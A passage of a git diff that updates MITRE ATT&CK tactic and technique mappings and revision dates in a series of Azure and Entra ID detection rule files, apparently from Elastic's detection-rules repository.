"https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index 222286c88de..a349b7481c8 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,26 +73,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1651" +name = "Cloud Administration Command" +reference = "https://attack.mitre.org/techniques/T1651/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml b/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml index 4d0f2369673..f52e088dc52 100644 --- a/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml +++ b/rules/integrations/azure/persistence_entra_id_application_credential_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,18 +87,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update applica [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml index a89c1fcdf5d..c4d989ec39c 100644 --- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -102,12 +103,28 @@ id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml index 94d21dfa04f..29ec1157ee0 100644 --- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml +++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,19 +83,36 @@ event.dataset:azure.auditlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml index 5729fb8abc7..399321fc3c5 100644 --- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml +++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,19 +86,54 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml index 67622baed76..ac59e69abe3 100644 --- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml +++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,18 +84,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml index 421b38cec2b..58d2f4e9d7c 100644 --- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,30 +85,49 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml index b1eac4dbf32..ec43155f239 100644 --- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml +++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,43 +110,45 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -155,3 +157,20 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml index 39ea903de00..d294fd52148 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -81,6 +81,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -91,13 +92,28 @@ id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml index fd409ec66bb..01c3be3815b 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,36 +91,54 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml b/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml index b1f8591e4cc..b61fccee5f3 100644 --- a/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml +++ b/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/13" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,19 +81,31 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml b/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml index e292a7a70db..d3b95428b80 100644 --- a/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml +++ b/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/13" integration = ["azure"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,19 +106,36 @@ sequence by azure.correlation_id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml index 2ca71e31d2f..94600da21cf 100644 --- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml +++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,35 +95,64 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml index 0491e8e6a55..dcc9cdf623e 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -68,26 +68,39 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml index 0d51d53cae8..fd050eb7fb6 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,23 +73,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index ab26fc86d1c..d9fa2d2aa9f 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,39 +84,57 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 6cf84594742..8752c55c138 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,30 +78,54 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml index fa59f5be650..b0db0824583 100644 --- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml +++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,22 +75,39 @@ event.dataset: azure.graphactivitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.graphactivitylogs.properties.user_principal_object_id"] diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml index af9bc41d8c9..757b281be62 100644 --- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml +++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml @@ -2,7 +2,7 @@ creation_date = 